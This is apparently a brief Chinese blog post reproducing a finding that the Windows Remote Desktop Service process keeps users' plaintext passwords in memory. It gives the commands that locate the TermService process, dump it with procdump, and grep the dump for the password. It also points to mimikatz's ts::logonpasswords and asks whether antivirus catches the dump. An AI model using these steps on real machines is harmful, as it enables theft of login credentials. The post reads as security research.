推特上看到一篇推文 他发现了在远程桌面服务的内存中存储了用户明文密码,本文复现下。
我有一台08的server,账号密码为administrator [email protected]#
。使用3389登录
运行如下命令转储远程桌面服务的进程内存
1netstat -nob | Select-String TermService -Context 1
2.\procdump.exe -accepteula -ma 2812 rdp.dmp
然后用strings过滤字符串发现确实抓到了明文
1strings -el rdp.dmp |grep admin08 -C3
mimikatz发布了一个Pre-release版本,提供了ts::logonpasswords
一键抓取,不过在2008上不起作用,等待本杰明继续更新。
其他进程中是否还有明文保存?转储远程桌面服务进程的内存是不是不会被杀软拦截了?Windows是不是不安全了?
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。